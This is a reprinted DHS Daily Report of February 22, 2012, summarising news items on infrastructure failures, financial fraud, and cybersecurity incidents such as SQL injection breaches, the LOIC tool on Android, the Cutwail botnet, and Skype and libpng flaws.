Wednesday, February 22, 2012

Complete DHS Daily Report for February 22, 2012

Daily Report

Top Stories

• Bank of New York Mellon Corp., the world’s largest custody bank, defrauded clients of more than $1.5 billion through foreign-exchange trades, according to a new complaint filed by the U.S. government. – Bloomberg. See item 23 below in the Banking and Finance Sector.

• A failure of the cable support system on the Martin Olav Sabo Bridge in Minneapolis, Minnesota, resulted in the bridge’s closure and led to light-rail and traffic disruptions for at least 3 days. – Minneapolis Star Tribune (See item 26)

26. February 21, Minneapolis Star Tribune – (Minnesota) Hiawatha light-rail service suspended, road and bridge closed. A failure of the cable support system February 19 on the Martin Olav Sabo Bridge in Minneapolis, Minnesota, resulted in the bridge’s closure, the suspension of light-rail service at three stops, and the rerouting of vehicle traffic. The cable broke loose from the top of the span and fell about 100 feet onto the bridge. Safety concerns prompted the bridge’s closure, re-routing traffic, interrupting Hiawatha light-rail service, and sending more than 20 city workers on overtime to shore up the bridge. The disruptions continued into February 21. The bridge’s most recent inspection took place September 2011 but showed nothing “that got anyone’s attention,” said the director of transportation, maintenance, and repair for Minneapolis Public Works. He said a pedestrian came across a cable February 19 and reported it to the city. The bridge’s design consultant was San Francisco-based URS Corp., an engineering firm that consulted on the Interstate 35W bridge that collapsed in 2007. Thirteen people died and 145 were injured after its rush-hour collapse into the Mississippi River. A spokesman for URS said the firm is working with local officials “to evaluate the safety and stability of the bridge so that light rail service through the area may resume and Hiawatha Avenue be reopened.” Source:


Banking and Finance Sector

17. February 20, KPAX 8 Missoula; KAJJ 18 Kalispell – (Montana) Cornerstone Ponzi scheme defendant set to plead guilty. A Polson, Montana man who was accused in the largest Ponzi scheme in Montana history is set to plead guilty February 22. He is one of two men implicated in the scheme to rip off investors in connection with Cornerstone Financial, which the state named in an investigation more than 3 years ago. The state said the pair bilked investors out of more than $14 million, starting in 2005. Under terms of the plea agreement, prosecutors said the man will admit to 1 count of mail fraud, 1 count of wire fraud, and 14 counts of money laundering. The government initially accused the man of 23 counts of money laundering. The man faces up to 10 years in prison and several hundred thousand dollars in fines as well as forfeiting more than $1.3 million to the government. Source:

18. February 20, Ventura County Star – (California) Three more plead guilty in federal mortgage fraud cases. Three guilty pleas entered in a California court February 16 closed the book on nearly all of the 14 federal mortgage fraud cases filed 2 years ago after local real estate professionals reported the shady business practices. The three guilty pleas add to eight others in connection with the matter, dubbed “Operation Stolen Dreams” in June 2010 when it was publicized by the U.S. Justice Department. It involved 1,215 criminal defendants across the country and uncovered more than $2.3 billion in losses. In Ventura County, 2 indictments charged 14 people with filing fraudulent loan applications that caused banks to fund at least $35 million in mortgages. Crimes were said to have taken place during the California real estate boom — from 6 or 7 years ago through early 2009. Some of the victims were recruited in public-housing tracts. Many spoke little English and barely made minimum wage. The accusations said paperwork was falsified to show inflated figures for the buyers’ income and assets. Source:

19. February 20, WTVT 13 Tampa – (Florida) ATMs raided with stolen card numbers. Police in Tampa, Florida, are trying to identify two, possibly three men, who stole thousands of dollars from the bank accounts of strangers, WTVT 13 Tampa reported February 20. Police said one of the unknown men stood at a Bank of America machine January 22 for up to 30 minutes, putting in card after card. Each time, the suspect withdrew the maximum amount of money possible. The thieves used ATMs at four different Tampa banks January 22, mostly downtown. They got their hands on debit card numbers and PIN numbers, and used that information to create their own cards. Source:

20. February 20, Softpedia – (International) Royal Navy, Federal Reserve and other sites hacked by D35m0nd142. A German grey hat hacker managed to breach the official Web site of the Royal Navy and the U.S. Federal Reserve bank after finding an SQL injection vulnerability, Softpedia reported February 20. “The admins have been warned immediately before of this post. The vulnerable ‘parameter’ has been obscured to prevent damages from others,” the hacker wrote on Pastebin. The hacker found 47 blind SQL injection flaws on the official Web site of the U.S. Federal Reserve. The hacker took a peek at the security measures implemented by Arizona University, Stanford University, and an education institution in Hong Kong. In most of the cases, the site’s administrators were notified before the hacker published his proof-of-concepts. It is uncertain how many of the breached sites patched their vulnerabilities. Source:

21. February 19, Wired – (International) Feds seize $50 million in Megaupload assets, lodge new charges. The authorities said February 17 they seized $50 million in Megaupload-related assets and added additional charges, including conspiracy to commit money laundering, in one of the United States’ largest criminal copyright infringement prosecutions. Megaupload, the popular file-sharing site, was shuttered in January and its top officials indicted by the Justice Department. The government said Megaupload’s “estimated harm” to copyright holders was “well in excess of $500 million.” The new charges levied February 17 allege Megaupload falsely represented to rights holders that it removed infringing works from its servers. The superseding indictment in the Eastern District of Virginia also claims Megaupload paid one of its registered users $3,400 between 2008 and 2009 for uploading 16,960 files that generated 34 million views. The files included copyrighted motion pictures, the government said. The government also said despite claims of having 180 million registered users, the site had 66.6 million. The authorities said 5.86 million of these registered users uploaded files, “demonstrating that more than 90 percent of their registered users only used the defendant’s system to download.” Source:

22. February 17, Cypress Creek Mirror – (Texas) Deputies arrest suspected serial bandit. February 16, deputies arrested a woman they believe to be responsible for at least five bank robberies in northwest Harris County, Texas. The latest robbery happened at a Capital One Bank around 4 p.m. February 16. According to authorities, a woman entered the bank and handed the teller a note demanding money. Deputies arrested the woman as she left with the money. She was also reportedly found with a wig and gun. December 28, 2011, the FBI said a woman entered a Capital One bank in Houston and handed the teller a threatening note demanding money. In another robbery committed December 16, 2011, at a Capital One bank, the woman told the teller she wanted more when she received the cash. The teller explained there was no more, and the robber left. The woman may also be linked to robberies of a Capital One bank and a Compass bank in November 2011. Source:

23. February 17, Bloomberg – (New York) Bank of New York accused of $1.5 billion fraud in amended U.S. complaint. Bank of New York Mellon Corp., the world’s largest custody bank, defrauded clients of more than $1.5 billion through foreign-exchange trades, according to a new complaint filed February 16 by the U.S. government. The bank “repeatedly lied” about a service for foreign currency transactions and defrauded clients, including pension funds and federally insured financial institutions of more than $1.5 billion, the U.S. attorney’s office in Manhattan said in an amended complaint. The government’s lawsuit is one of several brought against the bank, including one by the New York attorney general, alleging it defrauded clients through its so-called standing instruction foreign-exchange service. In the first complaint filed in October 2011, the U.S. attorney’s office said the bank defrauded clients of “hundreds of millions of dollars.” Part of the lawsuit was resolved under an agreement approved in January. Source:

24. February 17, Wired – (International) Goldman Sachs code-theft conviction reversed. A federal appeals court in New York City February 17 reversed the conviction of a former Goldman Sachs programmer sentenced to 8 years for stealing the bank’s high-speed trading software. The programmer was convicted in 2010 of theft of trade secrets under the Economic Espionage Act. The Russian-born man worked for Goldman Sachs until June 2009, when authorities said he siphoned source code for the company’s valuable software on his way out the door to take a new job with another company. The appellate court reversed the conviction without explanation, and ordered the man free on %750,000 bond. Authorities alleged the former Goldman vice president stole “hundreds of thousands of lines” of source code. They alleged he downloaded various software from the Goldman Sachs network and transferred it to a storage Web site hosted in Germany, before trying to erase his tracks. He allegedly used a script to copy, compress, encrypt, and rename files. Once the data was transferred, the program used to encrypt the files was erased, and he attempted to delete the network’s batch history showing his activity. Prosecutors said he made several copies of the code and had it on his laptop when he flew to Chicago to meet his new employers at Teza Technologies. Source:

For another story, see item 44 below in the Information Technology Sector.

Information Technology

42. February 21, Softpedia – (International) LOIC DDOS attack tool migrated to Android. The Low Orbit Ion Cannon (LOIC) is a popular denial-of-service tool used by hackers who want to take down particular Web sites. Recently, researchers have seen myriad variants, including the JavaScript-powered version that allows inexperienced hackers to attack sites. Now, researchers have come across a version designed for Android users. McAfee experts report the tool was first advertised by Anonymous Argentina, with the hacktivists urging supporters to download the application to aid their cause. This version of WebLOIC for Android is not something developed from scratch. The hackers instead easily ported the Web application using a free online service that creates Android apps from a URL or a piece of HTML code. Further analysis has allowed researchers to determine it is programmed to send 1,000 HTTP requests with one of the parameters being the message “We are LEGION.” McAfee identified this tool as Android/DIYDoS and cataloged it as being a potentially unwanted program. Source:

43. February 20, IDG News Service – (International) Mozilla gives CAs a chance to come clean about certificate policy violations. Mozilla asked all certificate authorities (CAs) to revoke subordinate CA certificates currently used for corporate secure sockets layer (SSL) traffic management, offering an amnesty to CAs who breached Mozilla’s conditions for having their root certificates ship with its products, IDG News Service reported February 20. The request comes after Trustwave recently admitted to issuing a sub-CA certificate to a private firm for use in a data loss prevention system. Sub-CA keys can be used to sign SSL certificates for any domain name on the Internet, which makes them dangerous if they fall in the wrong hands. Even though Trustwave argued the sub-CA key was stored in a hardware security module (HSM), making it irretrievable, the fact that such a powerful certificate was issued to a private company that was not a certificate authority represents a violation of Mozilla’s policy. CAs voluntarily adhere to Mozilla’s CA Certificate Policy to have their root keys included by default in Firefox, Thunderbird, and other products. Because there is reason to believe multiple CAs engage in this type of behavior, Mozilla decided to offer everyone a one-time chance to come clean about it without risking repercussion. Mozilla made its amnesty offer in an e-mail to all CAs February 17, asking them to revoke sub-CA certificates used for SSL man-in-the-middle interception or traffic management and to destroy the corresponding HSMs. CAs have until April 27 to comply with these requests. If such certificates are found after that date, the issuing CAs will face punishments including the removal of their root keys from Mozilla’s products. Source:

44. February 17, ZDNet – (International) Cutwail botnet resurrects, launches massive malware campaigns using HTML attachments. Security researchers from M86Security are contributing the increase in malicious malware campaigns using HTML attachments to the resurrection of the Cutwail botnet, responsible for “spamvertising” these campaigns, ZDNet reported February 17. Using the company’s sensor networks, the researchers observed three peaks of “spamvertised” malicious campaigns using HTML attachments for serving client-side exploits to unsuspecting users. The campaigns include the FDIC “Suspended bank account” spam campaign, the “End of August Statement” spam campaign, and the “Xerox Scan” spam campaign. Once the user downloads and views the malicious attachment, JavaScript will redirect her to the client-side exploiting URL part of the malicious network currently relying on the Phoenix Web malware kit. Once the researchers obtained access to the command and control interface of the exploit kit, they noticed the majority of referrers were coming from “blank” referrer, meaning these are end and corporate users downloading and viewing the malicious attachments on their computers. Source:

45. February 17, Softpedia – (International) Memory corruption vulnerability found in Skype 5.6.59.x. Vulnerability Lab researchers identified a high risk memory corruption flaw that affects the 5.6.59.x versions of Skype, Softpedia reported February 17. By exploiting this flaw, an attacker could remotely crash a computer running Windows 7 by sending a file from a Linux client. The experts demonstrated this vulnerability, found in the file transfer module, by sending a file from Skype v2.2.0.35 Beta for Linux to a contact running Skype on a Windows 7 x64 operating system. The transfer resulted in a stable memory corruption on the Windows client side. “The vulnerability can be exploited by remote attackers with low required user inter action (accept). Successful exploitation requires to accept a file transfer (user inter action) or receive messages & information,” Vulnerability Lab representatives told Softpedia. The security hole only works on Acer Aspire 5738 notebooks, powered by an Intel Core 2 Duo T6600 processor, and running a Windows 7 x64 operating systems. The bug was reproduced 4 out of 11 times, its successful exploitation resulting in a software and context freeze, and an access violation message. The vulnerability was identified and reported to Skype in November 2011, with the vendor responding 2 days later. The issue was addressed between November 9 and February 17. The latest Skype version is, which likely incorporates the fix for the vulnerability. Vulnerability Lab researchers also identified a buffer overflow vulnerability in Yahoo! Messenger, and they showed how an attacker can make Google+ posts on a user’s behalf by tricking him into playing a game. Source:

46. February 17, H Security – (International) Vulnerability in libpng prompts Firefox and Thunderbird updates. The Mozilla Project has released updates to Firefox and Thunderbird, H Security reported February 17. According to the release notes, the version 10.0.2 updates to the open source Web browser and the news and e-mail client to address a security vulnerability. As of February 17, however, the project’s security pages provide no details on what was fixed. These releases came soon after a Chrome update which closed 13 security holes and took the version number to 17.0.963.56. One forum discussion suggests one vulnerability was the reason for the “chemspill” Firefox and Thunderbird updates. One forum entry refers to an integer overflow in libpng, the official PNG reference library. Firefox bug number 727401 is currently restricted and not publicly viewable on the Bugzilla system. It corresponds to a bug Google paid a researcher for discovering, which concerns uncompressing PNG files. According to the comments in the Chromium code, the bug can cause an integer overflow or truncation. It is currently unknown whether the vulnerability is being actively exploited in the wild. All versions of libpng since 1.2.8 appear to be affected. According to an advisory from Secunia, exploitation could result in execution of arbitrary code on a victim’s system when viewing a specially crafted PNG image in an affected browser.Source:

47. February 17, Computerworld – (International) Apple’s new OS X tightens screws on some malware. Apple will introduce a new Mac security model with OS X Mountain Lion this summer that by default lets users install only programs downloaded from the Mac App Store or those digitally signed by a registered developer, Computerworld reported February 17. Some experts called Gatekeeper — Apple’s name for the model and technology — a game-changer while others criticized it as less than watertight. Gatekeeper will block the installation of the most common kind of Mac malware yet: trojan horses unwittingly executed by users who have been duped into downloading and installing fake software. Source:

For more stories, see items 20, 21, and 24, above in the Banking and Finance Sector and 50 below in the Communications Sector.

Communications Sector

48. February 20, WWLP 22 Chicopee – (Massachusetts) Phone service returned in Huntington. Landline telephone service was completely restored to residents of Huntington, Massachusetts, WWLP 22 Chicopee reported February 20. Phone service in that area was knocked out when an alleged hit-and-run driver took out a utility pole on Route 112. Residents and businesses were without service for 2 days, and Verizon workers initially thought it could take up to 5 days before everyone had telephone service again. However, by 6 p.m. February 19, everyone was back on line. Source:

49. February 18, WTOV 9 Steubenville – (Ohio) Missing cable causes telephone outage in Jefferson County. Residents in parts of Mingo Junction and Goulds, Ohio, dealt with a telephone outage February 18 after a section of a cable went missing. Area telephone service providers said they were aware of the incident. Jefferson County 911 dispatchers said only landline phone service was affected, but it was unclear when the issue would be resolved. Source:

50. February 18, Mooresville Tribune – (North Carolina) Cable repair ends week of headaches for MI-Connection. A week of frustration and Internet service interruptions for many MI-Connection customers in North Carolina ended February 18 when repair crews completed a complicated splicing of a damaged fiber optic cable spanning Lake Norman. Officials said applications such as video streaming, returned to normal just after midnight. February 18, MI-Connection said a cut in a 1,600-foot line running above the N.C. 150 Bridge west of Mooresville occurred February 12 and caused reduced bandwidth and Internet speeds for some customers. The firm’s CEO said one of the company’s two fiber backbone feeds went down when the cable was damaged, possible by a bullet. System officials notified XO Communications and a trouble ticket was issued to DukeNet, the carrier XO utilizes. The CEO said whatever struck the cable creased the fiber casing, and subsequent cold weather and moisture triggered the break. The entire line had to be replaced. The CEO said the system’s available bandwidth was reduced by 50 percent by the damaged cable. Even before the incident, MI Connection began the process of adding another “backbone provider” to the two existing vendors, he said. Source:

For more stories, see items 42 and 45 above in the Information Technology Sector.